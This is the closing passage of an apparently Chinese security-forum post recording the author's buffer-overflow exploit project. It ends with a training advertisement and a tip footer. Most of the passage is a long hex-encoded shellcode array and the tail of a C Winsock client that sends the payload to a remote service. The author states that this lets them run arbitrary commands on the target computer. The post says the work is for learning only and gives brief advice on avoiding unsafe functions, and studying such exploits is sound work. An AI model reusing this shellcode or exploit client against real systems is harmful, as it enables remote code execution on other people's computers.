"\x9A\x64\xF4\x7D\x17\x7D\x17\x41\xE8\xC0\x9E\x52\xE3\xE8\x62\xE3"\ "\xE8\x62\xEF\xE8\x62\xEB\xFF\xDA\x17\x17\x17\xE8\x62\xEF\x7F\x74"\ "\x9E\xC6\x58\xFF\x10\x17\x17\x17\x7D\x17\xE8\xC7\x9C\xF2\x4A\x42"\ "\x9C\xFB\x94\xFB\x1B\x45\x9C\x5A\x1B\x9C\x56\x2B\x9C\x53\x1F\x6F"\ "\x9C\x6B\x1F\x0B\x14\xEE\x9E\x6A\xEB\x9C\x6B\x1F\x37\x14\xEE\x9E"\ "\x6A\xEF\x9C\x6B\x1F\x33\x14\xEE\x9E\x6A\xE3\x9C\x6B\x1F\x0F\x24"\ "\xDE\xFC\x16\x56\x9C\x62\xEF\x9C\x23\x99\x9C\x42\x1B\x9A\x23\x25"\ "\xE8\x62\x1F\x41\xFF\x36\x17\x17\x17\x94\xEF\x16\x62\xF2\x9C\x62"\ "\xE3\x24\xE8\x71\x9C\x2B\x59\x9C\x42\xEB\x9C\x23\xAD\x9C\x42\x1B"\ "\x9A\x13\x25\x4D\x9C\xF2\x4A\xD5\x1F\x17\x42\x9C\xFB\x94\xFB\x13"\ "\xD0\x52\xEB\x17\x17\x17\x17\x44\x46\x45\x9C\x62\x1F\x24\xDE\x24"\ "\xD7\x9D\x13\x19\x93\xD7\x63\x01\x9C\x4A\xEB\xD6\xF4\x0E\x9C\x42"\ "\xEB\xD6\xFD\x10\x1C\xCD\x14\xCF\x9E\x4A\xEB\x56\xFC\xF4\x9C\x4A"\ "\x1B\x9C\x42\xEB\x24\xD7\x2C\xCD\x62\x12\xAF\x16\x17\x17\x17\x4D"\ "\x4E\x4C\x9C\xF2\x4A\xD5\x1F\x17\x42\x9C\xFB\x96\xFB\x17\x14\x17"\ "\x17\xE8\x62\x07\x7F\x2A\x7D\xA3\x97\xFF\x26\xE8\xE8\xE8\x9A\xA2"\ "\x17\xEA\xE8\xE8\x41\x7F\x15\x15\x17\x17\xE8\xC7\x92\xD7\x18\x92"\ "\x17\x16\x17\x17\xE8\x62\x07\x7F\x3A\x25\x6F\xC9\xFF\x19\xE8\xE8"\ "\xE8\x7D\x17\x7D\x17\x7D\x17\x7D\x11\x7D\x16\x7D\x15\xE8\xC7\x9E"\ "\x52\xEB\xE8\x62\x07\x7F\x73\x07\xB0\xCA\xFF\xE7\xE9\xE8\xE8\x71"\ "\xD0\x92\x17\xE9\xE8\xE8\x15\x17\x71\xD0\x92\x15\xE9\xE8\xE8\x12"\ "\xFC\xD0\x92\x13\xE9\xE8\xE8\x17\x17\x17\x17\x9A\xA2\x17\xE9\xE8"\ "\xE8\x7D\x03\x41\xE8\x62\xEB\xE8\xC7\x92\xD7\x18\x92\xB4\x17\x17"\ "\x17\xE8\x62\x07\x7F\x1B\x88\xC4\x5C\xFF\xA6\xE9\xE8\xE8\x7F\xE8"\ "\xE8\xE8\x68\xE8\x62\xEB\xE8\xC7\x94\xEF\x17\x18\x92\x94\x17\x17"\ "\x17\xE8\x62\x07\x7F\xA6\x09\x80\x16\xFF\x86\xE9\xE8\xE8\x7D\x17"\ "\x7D\x17\xE8\x62\xEB\xE8\xC7\x9E\x52\xEB\xE8\x62\x1B\x7F\xDE\xAB"\ "\xB1\x7C\xFF\x6F\xE9\xE8\xE8\x9C\xC7\x9A\xAA\x67\xE8\xE8\xE8\xAE"\ "\x06\x17\x17\x17\xAF\x17\x17\x17\x17\xEB\xE4\xBC\xD0\x92\x67\xE8"\ "\xE8\xE8\x53\x17\x17\x17\xD0\x52\x8B\x16\x16\x17\x17\x71\xD0\x52"\ "\xB7\x17\x17\x9C\x62\xEB\x9E\x62\xBF\x9E\x62\xBB\x9E\x62\xA7\x9A"\ "\xA2\x67\xE8\xE8\xE8\x9A\xAA\x17\xE9\xE8\xE8\x9C\x4A\x1F\x9A\x4C"\ "\xCC\x40\x41\x7D\x17\x7D\x17\x7D\x17\x7D\x16\x7D\x17\x7D\x17\x44"\ "\x7D\x17\xE8\xC5\x9C\xF2\x4A\xD5\x1B\x17"; recv(stListen, szRecv, sizeof(szRecv), 0); send(stListen, pCompand, strlen(pCompand), 0); // 6.接收信息 recv(stListen, szRecv, sizeof(szRecv), 0); // 7.清理环境 closesocket(stListen); WSACleanup(); return 0; }
5.结语
1)最后执行结果如下,可以按自己的意愿控制对方电脑执行命令(如创建一个helloworld文件夹)
2)缓冲区溢出一般是没有进行边界检查,或使用了不安全的函数,避免这个情况能大大提高安全性。
3)想要完成漏洞分析,对于出现漏洞的设备或项目有所了解才能顺利完成任务。
4)热爱国家,遵纪守法,仅用于学习,请勿作恶
5)本文记录平日自己写的项目(其中用到的知识来自于15pb,遇到不解处多谢老师指导)
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
|
|
---|---|
|
666
|